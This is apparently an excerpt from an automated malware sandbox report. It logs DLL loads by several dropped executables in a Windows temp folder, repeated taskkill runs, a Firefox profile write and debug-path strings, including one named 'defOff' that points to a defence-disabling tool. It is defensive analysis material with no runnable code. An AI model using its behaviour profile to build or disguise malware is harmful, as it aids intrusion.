Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2955264 > 1048576
Source: file.exe Static PE information: Raw size of iktxewek is bigger than: 0x100000 < 0x2a5e00
Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2992504945.0000020F3083B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: my_library.pdbU source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: my_library.pdb source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: A partial SuggestResult object, without the 'content' parameter.Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000003.2350536379.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2483748959.0000000000592000.00000040.00000001.01000000.00000006.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000003.2873579535.00000000026E0000.00000004.00001000.00020000.00000000.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3008298151.0000000000632000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp

